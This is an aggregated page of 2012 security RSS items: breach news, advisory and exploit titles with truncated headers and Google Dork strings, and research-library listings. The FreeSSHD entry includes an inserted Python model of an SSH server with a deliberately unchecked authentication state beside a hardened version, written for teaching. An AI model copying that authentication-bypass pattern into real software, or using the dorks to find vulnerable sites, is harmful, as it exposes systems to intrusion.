http://seclists.org/rss/isn.rss Posted by InfoSec News on Dec 10 http://www.theregister.co.uk/2012/12/10/pakistan_cyber_army_hack_bangladesh_china/ By Phil Muncaster The Register 10th December 2012 Hacktivists claiming to hail from the Pakistan Cyber Army have defaced over 400 Chinese government web sites and also hit in excess of 20 Bangladeshi government sites. A hacker known as Code Cracker is claiming responsibility for the attack on the official web site of Xuchang City Peoples...

==> Swiss Warning Intelligence Partners About Massive Data Breach

http://seclists.org/rss/isn.rss Posted by InfoSec News on Dec 10 http://www.securitymanagement.com/news/swiss-warning-intelligence-partners-about-massive-data-breach-0011219 By Carlton Purvis securitymanagement.com 12/06/2012 It's a real life version of Office Space except with national security implications. Swiss intelligence is warning the U.S. and Britain that counterterrorism information may have been leaked after a disgruntled employee stole a large amount of sensitive data, Reuters reported...

==> Aramco Says Cyberattack Was Aimed at Production

http://seclists.org/rss/isn.rss Posted by InfoSec News on Dec 10 http://www.nytimes.com/2012/12/10/business/global/saudi-aramco-says-hackers-took-aim-at-its-production.html By REUTERS December 9, 2012 JEDDAH, Saudi Arabia -- Saudi Arabia's national oil company, Aramco, said on Sunday that a cyberattack against it in August that damaged some 30,000 computers was aimed at stopping oil and gas production in Saudi Arabia, the biggest exporter in the Organization of the Petroleum Exporting Countries. The...

==> Russian hackers break into Australian medical clinic's patient records, demand $4,000 ransom

http://seclists.org/rss/isn.rss Posted by InfoSec News on Dec 10 http://thenextweb.com/au/2012/12/10/australian-medical-practice-patient-database-held-to-ransom-by-russian-hackers/ By Joel Falconer The Next Web 10 Dec '12 A Gold Coast, Australia medical practice has been held to ransom by a group of Russian hackers. The hackers encrypted the practice's patient database, rendering it unusable until decrypted. The hackers have asked for the fairly low sum of $4,000, ABC News reports, noting that...

==> CanSecWest13 CFP Open Until December 14 2012, Conf March 7-9 2013, Vancouver

http://seclists.org/rss/isn.rss Posted by InfoSec News on Dec 07 Forwarded from: Dragos Ruiu <dr (at) kyx.net> The CFP is open and a new conference rushes forward. The shorter version: Package up your PII/contact info that we need so we can book flights and figure out visas, put together a summary of who you are and what you want to talk about that is cool new security research, and email them to our jaded, grumpy reviewers (some of whom still use mutt so make sure you...

==> Submarine expert arrested after 'attempting to hand over Navy's secrets to FBI agents posing as Russian spies'

http://seclists.org/rss/isn.rss Posted by InfoSec News on Dec 07 http://www.dailymail.co.uk/news/article-2244374/Submarine-expert-arrested-attempting-hand-Navys-secrets-FBI-agents-posing-Russian-spies.html By Daily Mail Reporter 6 December 2012 Former U.S. Navy submarine warfare specialist Robert Patrick Hoffman II was arrested Thursday morning on charges of turning over classified information to undercover FBI agents posing as representatives of the Russian Federation. Hoffman, 39, of Virginia,...

==> Snare For Linux Cross Site Request Forgery

http://securityreason.com/rss/SecurityAlert Topic: Snare For Linux Cross Site Request Forgery Risk: Low Text:Snare for Linux Cross-Site Request Forgery I. BACKGROUND - Snare for Linux provides a 'C2' or 'CAPP' style audit ...

==> Snare For Linux Cross Site Scripting

http://securityreason.com/rss/SecurityAlert Topic: Snare For Linux Cross Site Scripting Risk: Low Text:Snare for Linux Cross-Site Scripting via Log Injection I. BACKGROUND - Snare for Linux provides a 'C2' or 'CAPP' ...

==> SimpleInvoices 2011.1 Cross Site Scripting

http://securityreason.com/rss/SecurityAlert Topic: SimpleInvoices 2011.1 Cross Site Scripting Risk: Low Text:Overview SimpleInvoices 2011.1 is vulnerable to Cross-site Scripting (XSS). Software Description Simple Invoices is a fr...

==> gpEasy CMS XSS Vulnerability

http://securityreason.com/rss/SecurityAlert Topic: gpEasy CMS XSS Vulnerability Risk: Low Text: ...

==> Axway Directory Traversal

http://securityreason.com/rss/SecurityAlert Topic: Axway Directory Traversal Risk: Medium Text:Secure Transport Path Traversal Vulnerability Public Disclosure Date: November 11, 2012 Vendors Affected: Axway http:/...

==> HP Data Protector DtbClsLogin Buffer Overflow

http://securityreason.com/rss/SecurityAlert Topic: HP Data Protector DtbClsLogin Buffer Overflow Risk: High Text:## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please...

==> MyBB Profile Blog plugin multiple vulnerabilities

http://securityreason.com/rss/SecurityAlert Topic: MyBB Profile Blog plugin multiple vulnerabilities Risk: Medium Text:# Exploit Title: MyBB Profile Blog plugin multiple vulnerabilities. # Google Dork: inurl:member.php intext:"Profile Blogs" for...

==> MyBB plugin Bank v3 SQL Injection

http://securityreason.com/rss/SecurityAlert Topic: MyBB plugin Bank v3 SQL Injection Risk: Medium Text:# Exploit Title: MyBB plugin SQLi 0day # Exploit Author: Red_Hat [NullSec] # Software Link: http://mods.mybb.com/download/ba...

==> Joomla Jooproperty SQL Injection &Cross Site Scripting

http://securityreason.com/rss/SecurityAlert Topic: Joomla Jooproperty SQL Injection &Cross Site Scripting Risk: Medium Text: ...

==> Nagios Core 3.4.3 Buffer Overflow

http://securityreason.com/rss/SecurityAlert Topic: Nagios Core 3.4.3 Buffer Overflow Risk: High Text:history.cgi is vulnerable to a buffer overflow due to the use of sprintf with user supplied data that has not been restricted ...

==> Android Kernel 2.6 Denial Of Service

http://securityreason.com/rss/SecurityAlert Topic: Android Kernel 2.6 Denial Of Service Risk: Medium Text:# Exploit Title: Android Kernel 2.6 Local DoS # Date: 12/7/12 # Author: G13 # Twitter: @g13net # Versions: Android 2.2, 2.3...

==> MyBB Kingchat Cross Site Scripting

http://securityreason.com/rss/SecurityAlert Topic: MyBB Kingchat Cross Site Scripting Risk: Low Text:Exploit Title: MyBB 'kingchat' chat-box plugin. Google Dork: inurl:/kingchat.php? Date: 8/12/12 Author: VipVince Vendor Hom...

==> DIMIN Viewer 5.4.0 WriteAV Arbitrary Code Execution

http://securityreason.com/rss/SecurityAlert Topic: DIMIN Viewer 5.4.0 WriteAV Arbitrary Code Execution Risk: High Text:#!/usr/bin/perl # DIMIN Viewer 5.4.0 <= WriteAV Arbitrary Code Execution # Author: Jean Pascal Pereira

==> FreeVimager 4.1.0 WriteAV Arbitrary Code Execution

http://securityreason.com/rss/SecurityAlert Topic: FreeVimager 4.1.0 WriteAV Arbitrary Code Execution Risk: High Text:#!/usr/bin/perl # FreeVimager 4.1.0 <= WriteAV Arbitrary Code Execution # Author: Jean Pascal Pereira ...

==> Dolphin3D web browser ActiveX Remote Command Execution

http://securityreason.com/rss/SecurityAlert Topic: Dolphin3D web browser ActiveX Remote Command Execution Risk: High Text:## # # Dolphin3D web browser ActiveX Remote Command Execution # # Date: Dez 9 2012 # Author: Rh0 # Affected Version: Dolp...

==> FreeFloat FTP Server Buffer Overflow

http://securityreason.com/rss/SecurityAlert Topic: FreeFloat FTP Server Buffer Overflow Risk: High Text:#Exploit title: FreeFloat FTP Server Remote Command Execution USER Command Buffer Overflow #Date: 06/12/2012 #Exploit Author:...

==> Cisco DPC2420 Cross Site Scripting & File Disclosure

http://securityreason.com/rss/SecurityAlert Topic: Cisco DPC2420 Cross Site Scripting & File Disclosure Risk: High Text:## ## -> Title: DPC2420 Multiple vulnerabilities ## -> Author: Facundo M. de la Cruz (tty0) ## -> E-mail: fmdlc@code4life.c...

==> Havalite 1.1.7 Cross Site Scripting & Shell Upload

http://securityreason.com/rss/SecurityAlert Topic: Havalite 1.1.7 Cross Site Scripting & Shell Upload Risk: High Text: ...

==> Site Builder RumahWeb Arbitrary Config File Disclosure Vulnerability

http://securityreason.com/rss/SecurityAlert Topic: Site Builder RumahWeb Arbitrary Config File Disclosure Vulnerability Risk: High Text:: # Exploit Title : Site Builder RumahWeb Arbitrary Config.xml Disclosure Vulnerability : # Date : 08 Desember 2012 : # Aut...

==> Pixie v1.04 blog Add Admin

http://securityreason.com/rss/SecurityAlert Topic: Pixie v1.04 blog Add Admin Risk: High Text: Pixie v1.04 blog Add Admin ## # Vendor : http://pixie-cms.googlecode.com/files/pixie_v1.04.zip # ...

==> KeenLook SQL injection Vulnerability

http://securityreason.com/rss/SecurityAlert Topic: KeenLook SQL injection Vulnerability Risk: Medium Text:# Exploit Title: KeenLook sql injection Vulnerability # Date: 05/10/2012 # Author: The Black Devils # Home: 1337day Exploit...

==> Centrify Deployment Manager v2.1.0.283 Local Root

http://securityreason.com/rss/SecurityAlert Topic: Centrify Deployment Manager v2.1.0.283 Local Root Risk: High Text:Centrify Deployment Manager v2.1.0.283 local root 12/7/2012 Taking a little longer look at the software, I managed to win a...

==> Centrify Deployment Manager v2.1.0.283 /tmp insecure file handling

http://securityreason.com/rss/SecurityAlert Topic: Centrify Deployment Manager v2.1.0.283 /tmp insecure file handling Risk: High Text:Centrify Deployment Manager v2.1.0.283 While at a training session for centrify, I noticed poor handling of files in /tmp. I...

==> TVMOBiLi Media Server 2.1.0.3557 Denial Of Service

http://securityreason.com/rss/SecurityAlert Topic: TVMOBiLi Media Server 2.1.0.3557 Denial Of Service Risk: Medium Text:Advisory ID: HTB23120 Product: TVMOBiLi media server Vendor: TVMOBiLi Vulnerable Version(s): 2.1.0.3557 and probably prior v...

==> Achievo 1.4.5 Cross Site Scripting & SQL Injection

http://securityreason.com/rss/SecurityAlert Topic: Achievo 1.4.5 Cross Site Scripting & SQL Injection Risk: Medium Text:Advisory ID: HTB23126 Product: Achievo Vendor: www.achievo.org Vulnerable Version(s): 1.4.5 and probably prior Tested Versi...

==> Splunk 5.0 Custom App Remote Code Execution

http://securityreason.com/rss/SecurityAlert Topic: Splunk 5.0 Custom App Remote Code Execution Risk: High Text:## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please...

==> WordPress Simple Gmail Login Path Disclosure

http://securityreason.com/rss/SecurityAlert Topic: WordPress Simple Gmail Login Path Disclosure Risk: Low Text: # Application- Wordpress Plugin Simple Gmail Login Exploit - Stack Trace Error URL- http://wordpress.org/extend/plugins...

==> ClipBucket 2.6 Revision 738 SQL Injection

http://securityreason.com/rss/SecurityAlert Topic: ClipBucket 2.6 Revision 738 SQL Injection Risk: Medium Text:Advisory ID: HTB23125 Product: ClipBucket Vendor: clip-bucket.com Vulnerable Version(s): 2.6 Revision 738 and probably prior...

==> FreeFloat FTP Server Arbitrary File Upload

http://securityreason.com/rss/SecurityAlert Topic: FreeFloat FTP Server Arbitrary File Upload Risk: High Text:## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please...

==> Maxthon3 about:history XCS Trusted Zone Code Execution

http://securityreason.com/rss/SecurityAlert Topic: Maxthon3 about:history XCS Trusted Zone Code Execution Risk: High Text:## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please...

==> VLC Media Player 2.0.4 Buffer Overflow

http://securityreason.com/rss/SecurityAlert Topic: VLC Media Player 2.0.4 Buffer Overflow Risk: High Text:Title : VLC media player 2.0.4 buffer overflow POC Version : 2.0.4 Twoflower Date : 2012-12-06 Vendor : http:/...

==> Kordil EDMS v2.2.60rc3 SQL Injection Vulnerability

http://securityreason.com/rss/SecurityAlert Topic: Kordil EDMS v2.2.60rc3 SQL Injection Vulnerability Risk: Medium Text:# Exploit Title: Kordil EDMS v2.2.60rc3 SQL Injection Vulnerability # Date: 12/05/2012 # Exploit Author: Woody Hughes

==> IBM System Director Agent DLL Injection

http://securityreason.com/rss/SecurityAlert Topic: IBM System Director Agent DLL Injection Risk: High Text:## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please...

==> m0n0wall 1.33 Cross Site Request Forgery

http://securityreason.com/rss/SecurityAlert Topic: m0n0wall 1.33 Cross Site Request Forgery Risk: Low Text: # # Exploit Title: m0n0wall 1.33 CSRF Remote root Access # Date: 30/11/2012 # Author: Yann CAM @ Synetis # Vendor or Sof...

==> Maxthon / Avant Browser XCS / Same Origin Bypass

http://securityreason.com/rss/SecurityAlert Topic: Maxthon / Avant Browser XCS / Same Origin Bypass Risk: Medium Text:Hi, Below you can find a short summary of discovered vulnerabilities in Maxthon and Avant browsers. Such vulnerabilities w...

==> Adobe IndesignServer 5.5 SOAP Server Arbitrary Script Execution Vulnerability

http://securityreason.com/rss/SecurityAlert Topic: Adobe IndesignServer 5.5 SOAP Server Arbitrary Script Execution Vulnerability Risk: High Text:## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please...

==> NVIDIA Install Application 2.1002.85.551 Buffer Overflow

http://securityreason.com/rss/SecurityAlert Topic: NVIDIA Install Application 2.1002.85.551 Buffer Overflow Risk: High Text:

==> Cyber Security Awareness Month

http://securitysumo.wordpress.com/feed/ The Internet Storm Center is offering daily tips on cyber-security, and specifically on incident handling, for the month of October. Check out the link to catch up on the daily tips or submit your own.

==> Apple OS X Root Privilege Vulnerability

http://securitysumo.wordpress.com/feed/ If you are a Mac user, and haven’t seen the latest security vulnerability for OS X yet, Macshadows has an excellent writeup, with a temporary solution. Essentially, you need to open a terminal window and paste the following command: sudo chmod u-s /System/Library/CoreServices/RemoteManagement/ARDAgent.app/Contents/MacOS/ARDAgent After you press return, you will be prompted for your password. This [...]

==> Portable and Cross-platform Personal Password Manager

http://securitysumo.wordpress.com/feed/ Having to change between two different platforms (Windows and OS X), I wanted a functional password manager that was both portable and cross-platform. KeePass fits this requirement, and even has a Linux port and several other versions, as well. KeePass is open source and free. Download the portable apps version of KeePass here, and the [...]

==> Revision3 Denial of Service Attack

http://securitysumo.wordpress.com/feed/ Revision3 spent the Memorial Day weekend fighting off a denial of service attack. Their blog post summarizes the shocking and angering results. Check it out.

==> I Will Derive …

http://securitysumo.wordpress.com/feed/ One of the funniest videos I have seen in a while (at least from my totally nerd viewpoint):

==> MacBook Pro Hard Drive Replacement

http://securitysumo.wordpress.com/feed/ I upgraded the hard drive in my MacBook Pro today. It went pretty well, but it is not really for the easily technologically intimidated! I followed (for the most part) the guide at ifixit. I ran into a few things that their guide didn't include, so I thought I would add my experience here. First, as you [...]

==> MacBook and MacBook Pro USB Ports

http://securitysumo.wordpress.com/feed/ This week on MacBreak Weekly ( Episode 88 ) one of the hosts was having sound problems with a USB headset. They discussed the problem and one of the other hosts suggested changing the port the headset is on. A short discussion followed and here are the results. The MacBook has two USB ports on [...]

==> VMWare Fusion 2 Beta and Backtrack Wireless

http://securitysumo.wordpress.com/feed/ If you are trying to use VMWare Fusion 2.0 Beta and anything wireless in Backtrack, you might want to wait until the next release. I had all different kinds of trouble getting wireless USB dongles working with the setup. First Kismet would quit because of a TCP error. Then I had several kernel panics. Going [...]

==> What’s on my USB key?

http://securitysumo.wordpress.com/feed/ I’ve gathered many programs for my USB memory stick so I thought I would list them here. Actually, when you get down to it, I have a couple of memory sticks I keep with me most of the time. The first one is an older stick and is only 256 mb. However, it has a [...]

==> Ubuntu 8.04, VMWare Server, Wine and Warcraft, DVD Playback

http://securitysumo.wordpress.com/feed/ I installed the latest Ubuntu (8.04) last weekend and have been playing around with it a bit this week. Wow, is it nice! It is noticeably quicker than my 7.10 install. Of course, I did a complete wipe and reinstall, so that probably has something to do with the speed. I installed VMWare Server as [...]

==> bogofilter buffer overflow

http://securityvulns.com/informer/rss.asp?l=EN Buffer overflow on base64 parsing. Applications: bogofilter 1.2 (12.12.2012)

==> Maxthon and Avant browsers multiple security vulnerabilities

http://securityvulns.com/informer/rss.asp?l=EN Cross-site scripting, information leakage, code execution. (12.12.2012)

==> Linux kernel IPv6 filtering bypass

http://securityvulns.com/informer/rss.asp?l=EN It's possible to bypass filtering with overlapping fragments. Applications: kernel 2.6 (12.12.2012)

==> HP OpenVMS DoS

http://securityvulns.com/informer/rss.asp?l=EN DoS via LOGIN and ACME_LOGIN. Applications: OpenVMS 8.4 (12.12.2012)

==> Web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)

http://securityvulns.com/informer/rss.asp?l=EN PHP inclusions, SQL injections, directory traversals, cross-site scripting, information leaks, etc. Applications: Smartphone Pentest Framework 0.1, SimpleInvoices 2011.1 (11.12.2012)

==> DIMIN Viewer memory corruption

http://securityvulns.com/informer/rss.asp?l=EN Memory corruption on GIF parsing. Applications: DIMIN Viewer 5.4 (11.12.2012)

==> Contaware FreeVimager memory corruption

http://securityvulns.com/informer/rss.asp?l=EN Memory corruption on GIF parsing. Applications: FreeVimager 4.1 (11.12.2012)

==> Centrify Deployment Manager symbolic links vulnerability, updated since 09.12.2012

http://securityvulns.com/informer/rss.asp?l=EN Insecure temporary files creation. Applications: Centrify Deployment Manager 2.1 (11.12.2012)

==> GNU GIMP memory corruption

http://securityvulns.com/informer/rss.asp?l=EN Memory corruption on XWD file parsing. Applications: gimp 2.8 (11.12.2012)

==> Snare multiple security vulnerabilities

http://securityvulns.com/informer/rss.asp?l=EN Information leakage, CSRF, XSS. Applications: snare 1.6 (11.12.2012)

==> FortiGate FortiWeb cross-site scripting

http://securityvulns.com/informer/rss.asp?l=EN A few cross-site scripting vulnerabilities. Applications: FortiWeb 4000C, FortiWeb 3000C, FortiWeb 1000C, FortiWeb 400C (10.12.2012)

==> FortiGate FortiDB cross-site scripting

http://securityvulns.com/informer/rss.asp?l=EN A few cross-site scripting vulnerabilities. Applications: FortiDB 2000B, FortiDB 1000C, FortiDB 400B (10.12.2012)

==> RIM BlackBerry PlayBook information leakage

http://securityvulns.com/informer/rss.asp?l=EN Local HTML file can send any data outside. (10.12.2012)

==> RSA NetWitness Informer multiple security vulnerabilities

http://securityvulns.com/informer/rss.asp?l=EN Web interface multiple vulnerabilities. Applications: RSA NetWitness Informer 2.0 (10.12.2012)

==> OpenStack security vulnerabilities, updated since 29.10.2012

http://securityvulns.com/informer/rss.asp?l=EN User authorization vulnerabilities. (10.12.2012)

==> Forescout NAC multiple security vulnerabilities, updated since 03.12.2012

http://securityvulns.com/informer/rss.asp?l=EN Cross-site scripting, protection bypass. Applications: Forescout NAC 6.3 (10.12.2012)

==> Web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)

http://securityvulns.com/informer/rss.asp?l=EN PHP inclusions, SQL injections, directory traversals, cross-site scripting, information leaks, etc. Applications: Squiz CMS 11654, SysAid Helpdesk 8.5, MODx 1.0, Achievo 1.4, ClipBucket, tinymcpuk 0.3, Manage Engine Exchange Reporter 4.1, Wordpress Facebook Survey 1, ManageEngine ServiceDesk 8.0, Simple Slider 1.0, dotProject 2.1, BugTracker.Net 3.5, Video Lead Form 0.5, SilverStripe CMS 3.0 (10.12.2012)

==> python keyring weak cryptography

http://securityvulns.com/informer/rss.asp?l=EN Insecure cipher initialization. (09.12.2012)

==> SonicWALL Continuous Data Protection multiple security vulnerabilities

http://securityvulns.com/informer/rss.asp?l=EN Multiple web interface vulnerabilities. Applications: Continuous Data Protection 5040 (09.12.2012)

==> splunk DoS

http://securityvulns.com/informer/rss.asp?l=EN Crash on malformed packet. Applications: Splunk 4.3 (09.12.2012)

==> HP Integrated Lights-Out information leakage

http://securityvulns.com/informer/rss.asp?l=EN Applications: iLO3, iLO4 (09.12.2012)

==> TVMOBiLi media server buffer overflow

http://securityvulns.com/informer/rss.asp?l=EN Buffer overflow while processing TCP/30888 GET request, multiple DoS conditions. Applications: TVMOBiLi media server 2.1 (09.12.2012)

==> Nagios XI security vulnerabilities

http://securityvulns.com/informer/rss.asp?l=EN Command injection, SQL injection. Applications: Nagios XI Network Monitor 2011 1.9 (09.12.2012)

==> IBM Director code execution

http://securityvulns.com/informer/rss.asp?l=EN The application loads a DLL from an arbitrary location, allowing code execution (DLL hijacking). Applications: IBM Director 5.20 (09.12.2012)

==> FreeSSHD / FreeFTPD authentication bypass

http://securityvulns.com/informer/rss.asp?l=EN The authentication result is not checked when the client starts an SSH session, so an unauthenticated client can open a session. Applications: FreeSSHD 2.1, FreeFTPD 2.3 (09.12.2012)
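The missing check described above, modelled as an added example that is not FreeSSHd's or FreeFTPd's code (and makes no claim about how those products are built): a server that records the authentication result but never consults it before honouring a channel-open request, beside the hardened dispatcher that refuses any channel until authentication has succeeded. The message numbers are the standard SSH ones from RFC 4252/4254; the credential store and the client message sequences are constructed for the demonstration.

```python
import hmac

# Standard SSH message numbers (RFC 4252 / RFC 4254); assumed for the model.
MSG_DISCONNECT = 1
MSG_USERAUTH_REQUEST = 50
MSG_USERAUTH_FAILURE = 51
MSG_USERAUTH_SUCCESS = 52
MSG_CHANNEL_OPEN = 90
MSG_CHANNEL_OPEN_CONFIRMATION = 91

# Constructed credential store for the example (plaintext only to keep the
# model short; a real server verifies a password hash or a public key).
USERS = {"admin": "correct horse battery staple"}


class Server:
    """Per-connection state plus the message dispatcher.

    strict=False reproduces the flaw class: the authentication result is
    recorded but never consulted before a CHANNEL_OPEN is honoured.
    strict=True is the hardened dispatcher.
    """

    def __init__(self, strict):
        self.strict = strict
        self.authenticated = False
        self.sessions = []   # channel types the server actually opened
        self.replies = []    # message numbers sent back to the client

    def _userauth(self, msg):
        stored = USERS.get(msg["user"], "")
        if stored and hmac.compare_digest(stored, msg["password"]):
            self.authenticated = True
            self.replies.append(MSG_USERAUTH_SUCCESS)
        else:
            self.replies.append(MSG_USERAUTH_FAILURE)

    def _channel_open(self, msg):
        # Hardened path: a CHANNEL_OPEN before USERAUTH_SUCCESS is a protocol
        # violation, not a retry, so drop the connection rather than answer.
        if self.strict and not self.authenticated:
            self.replies.append(MSG_DISCONNECT)
            return
        self.sessions.append(msg["channel_type"])
        self.replies.append(MSG_CHANNEL_OPEN_CONFIRMATION)

    def handle(self, msg):
        """Dispatch one client message; returns the reply message number."""
        if msg["type"] == MSG_USERAUTH_REQUEST:
            self._userauth(msg)
        elif msg["type"] == MSG_CHANNEL_OPEN:
            self._channel_open(msg)
        else:
            self.replies.append(MSG_DISCONNECT)  # anything unexpected
        return self.replies[-1]


def run(strict, messages):
    """Feed a client's message sequence to a fresh server, stopping at the
    first DISCONNECT. Returns (opened channel types, replies sent)."""
    srv = Server(strict)
    for msg in messages:
        if srv.handle(msg) == MSG_DISCONNECT:
            break
    return srv.sessions, srv.replies


# Constructed sequences: a client that fails a password and opens a session
# anyway, and an honest client that authenticates first.
BYPASS_ATTEMPT = [
    {"type": MSG_USERAUTH_REQUEST, "user": "admin", "password": "wrong"},
    {"type": MSG_CHANNEL_OPEN, "channel_type": "session"},
]
LEGIT = [
    {"type": MSG_USERAUTH_REQUEST, "user": "admin",
     "password": "correct horse battery staple"},
    {"type": MSG_CHANNEL_OPEN, "channel_type": "session"},
]

if __name__ == "__main__":
    print("unchecked auth state:", run(False, BYPASS_ATTEMPT))
    print("checked auth state:  ", run(True, BYPASS_ATTEMPT))
    print("honest client:       ", run(True, LEGIT))
```

The point the model makes is that the authentication state must gate every post-auth message type, not just the ones the author happened to think of; auditing a server for this class of bug means enumerating every handler reachable before USERAUTH_SUCCESS and confirming each one checks the flag.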

==> F5 FirePass SSL VPN information leakage

http://securityvulns.com/informer/rss.asp?l=EN CitrixAuth.php local file inclusion. Applications: FirePass SSL VPN 7.0 (09.12.2012)

==> HP LaserJet printers cross-site scripting

http://securityvulns.com/informer/rss.asp?l=EN Applications: Color LaserJet CP3525, LaserJet P3015, Color LaserJet CM3530, Color LaserJet CM6030, Color LaserJet CM6040, Color LaserJet CP4025, Color LaserJet CP4525, Color LaserJet CP6015, LaserJet P4014, LaserJet P4015, LaserJet P4515 (09.12.2012)

==> HP LaserJet Pro 400 MFP unauthorized access

http://securityvulns.com/informer/rss.asp?l=EN Applications: LaserJet Pro 400 (09.12.2012)

==> HP Intelligent Management Center User Access Manager unauthorized access

http://securityvulns.com/informer/rss.asp?l=EN uam.exe buffer overflow. Applications: HP Intelligent Management Center 5.1 (09.12.2012)

==> HP Network Node Manager I unauthorized access

http://securityvulns.com/informer/rss.asp?l=EN Applications: Network Node Manager i 9.20 (09.12.2012)

==> xen multiple security vulnerabilities

http://securityvulns.com/informer/rss.asp?l=EN Multiple DoS conditions. Applications: xen 4.1 (09.12.2012)

==> Data Security

http://securosis.com/feeds/research If you really think about it, technically all of “information security” is “data security”, but the reality is that most of our industry is focused on protecting networks and hosts, and very little is dedicated to protecting the information assets themselves. We here at Securosis prefer the term “Information-Centric Security”, since information is data with value (as opposed to just a bunch of 0’s and 1’s), but we know “data security” is more commonly used, and we’re not about to fight the industry. Since data security encompasses a wide range of tools, technologies, and processes, we will highlight top-level management issues on this page, and encourage you to explore the subtopics for more details on database security, DLP, encryption, and other specific areas. We keep all of our Research Library pages updated with our latest research. Content is added where it fits best, not in chronological order, so we mark new material with the month/year it’s added to help you find changes more easily.

Papers and Posts
------------
If you are just getting started, we recommend you read the following blog posts and papers in order. (In keeping with our Totally Transparent Research policy, for sponsored papers we also link to the original blog posts so you can see how the content was developed, and all public comments.)
1. The most important piece of work we’ve published on data security is the following: The Business Justification for Data Security. We recommend you download the white paper as it provides a condensed (and professionally edited) review, and here are the links to the individual blog posts to add additional color and commentary: Part 1, Part 2, Part 3, Part 4, Part 5, and Part 6. (03/09)
2. Tokenization vs. Encryption: Options for Compliance. This paper outlines the business uses for tokenization, and examines the tradeoffs between tokenization and traditional encryption.
3. Next, you should read our series of posts on the Data Security Lifecycle, which shows how all the various bits and pieces plug in together. Keep in mind that some of these technologies aren’t completely available yet, but the series should give you a good overview of how to take a big-picture approach to data security. Start with the Lifecycle, then read the details on the technologies, organized by phase: Part 1, Part 2, Part 3.
4. The general principles of Information-Centric/Data Security.
5. Data Verification Issues.
6. Data And Application Security Will Drive Most Security Growth For The Next 3-5 Years.
7. Defensive Security Stack, showing where data security fits in with network, host, and application security (I mention CMF, which is the same as DLP): Data Protection - It’s More than A + B + C.
8. We believe that two existing technologies are evolving into the “core” of data security: Data Loss Prevention and Database Activity Monitoring. They are evolving into what we call Content Monitoring and Protection (DLP, for protecting productivity applications and communications), and Application and Database Monitoring and Protection (DAM, for protecting applications and the data center). We define both technologies in Definitions: Content Monitoring and Protection and Application and Database Monitoring and Protection.
9. Continuation of Content Monitoring and Protection: How Data Loss Prevention and Database Activity Monitoring Will Connect.
10. Data classification comes up all the time when discussing data security. Here’s an overview that starts to introduce the idea of practical data classification: The Five Problems With Data Classification, an Introduction To Practical Data Classification. We followed it with a post: Practical Data Classification: Type 1, The Hasty Classification. But the truth is, classification is usually quite problematic, and we don’t recommend manual classification to most enterprise users, as we wrote in: Data Classification is Dead. (We haven’t finished our data classification series yet.)
11. Related to data classification, here is a post on Information Governance.
12. Before you start digging in too deep on data security, we recommend you prepare by understanding your users and infrastructure, as we wrote in: Information-Centric Security Tip: Know Your Users and Infrastructure.
13. File Activity Monitoring is an exciting new technology that finally gives us insight into not only how our files are used, but who the heck is accessing them, who should be accessing them, and when they violate security policies. We can finally do things like generate alerts when a sales guy starts sucking down all the customer files before moving to a competitor.

General Coverage
------------
1. Sorry, Data Labeling is Not the Same as DRM/ERM
2. Data Labels Suck.
3. Security Requirements for Electronic Medical Records.
4. The Data Breach Triangle.
5. Data Harvesting and Privacy.

Presentations
---------
These PDF versions of presentations may also be useful, although they don’t include any audio (for any audio/video, please see the next section).
* This is the Business Justification for Data Security Presentation that Rich and Adrian provided in February 2009.
* This presentation is on Mobile Data Security for the Enterprise.
* Our presentation on Information Centric Data Security and the Data Centric Security Lifecycle.
* Here’s the current version of Pragmatic Data Security, which provides a good, practical process overview with specific implementation details.
* Presentation on Data Protection in the Enterprise. Kind of a corporate overview.
* Presentation on XML Security.

Podcasts, Webcasts and Multimedia
We do not currently have any multimedia for this topic.

Vendors/Tools
---------
The following is just an alphabetized and categorized list of vendors and products in this area (including any free tools we are aware of). It does not imply endorsement, and is meant to assist you should you start looking for tools. Please email info@securosis.com if you have any additions or corrections. Since data security is such a broad issue, please see the sub-categories for vendors and tools. If much of this material seems somewhat generic, that’s because data/information-centric security is a fairly high-level topic. We really encourage you to learn about the specifics in the sub-categories in the navigation menu.

==> Upcoming Research

http://securosis.com/feeds/research The Securosis Research Agenda is a dynamic entity. We are constantly revisiting our research plans, so check back often to see what’s in the hopper:
* Understanding and Selecting a Web Application Firewall
* SIEM 2.0: Replacing Your SIEM Solution
* Securing Applications at Scale
* Masking for Compliance
* Code Security: Security for Developers
* Pragmatic Data Security
* Network Security Fundamentals
* Endpoint Security Fundamentals
* Database Security 2.0: Database Security for Relational and Non-relational Systems
* Understanding and Implementing Network Segregation
* Data Security for the Cloud
Some of these papers will be sponsored, some won’t, but all will be released for free under a Creative Commons license on our blog and within the Research Library.

==> All Research Papers

http://securosis.com/feeds/research
Application Security
* Securing Big Data: Recommendations for Securing Hadoop and NoSQL
* Pragmatic WAF Management: Giving Web Apps a Fighting Chance
* Building a Web Application Security Program
Cloud and Virtualization
Compliance
* Tokenization Guidance
* Tokenization vs. Encryption: Options for Compliance
* Data Encryption 101: A Pragmatic Approach to PCI
Data Security
* Understanding and Selecting Data Masking Solutions
* Implementing and Managing a Data Loss Prevention Solution
* Defending Data on iOS
* Understanding and Selecting a Database Security Platform
* Understanding and Selecting a File Activity Monitoring Solution
* Database Activity Monitoring: Software vs. Appliance
* The Securosis 2010 Data Security Survey
* Understanding and Selecting a Tokenization Solution
* Understanding and Selecting a DLP Solution
* Understanding and Selecting a Database Encryption or Tokenization Solution
* Low Hanging Fruit: Quick Wins with Data Loss Prevention (V2.0)
* Database Assessment
* Content Discovery Whitepaper
* Selecting a Database Activity Monitoring Solution
Endpoint Security
* The Endpoint Security Management Buyer’s Guide
* Endpoint Security Fundamentals
* Best Practices for Endpoint DLP
* Evolving Endpoint Malware Detection: Dealing with Advanced and Targeted Attacks
Network Security
* Defending Against Denial of Service (DoS) Attacks
* Network-based Malware Detection: Filling the Gaps of AV
* Applied Network Security Analysis: Moving from Data to Information
* Fact-Based Network Security: Metrics and the Pursuit of Prioritization
* Network Security in the Age of Any Computing
* Understanding and Selecting an Enterprise Firewall
Project Quant
* Malware Analysis Quant
* Measuring and Optimizing Database Security Operations (DBQuant)
* Network Security Ops Quant Metrics Model
* Network Security Operations Quant Report
* Project Quant Survey Results and Analysis
* Project Quant Metrics Model Report
Security Management
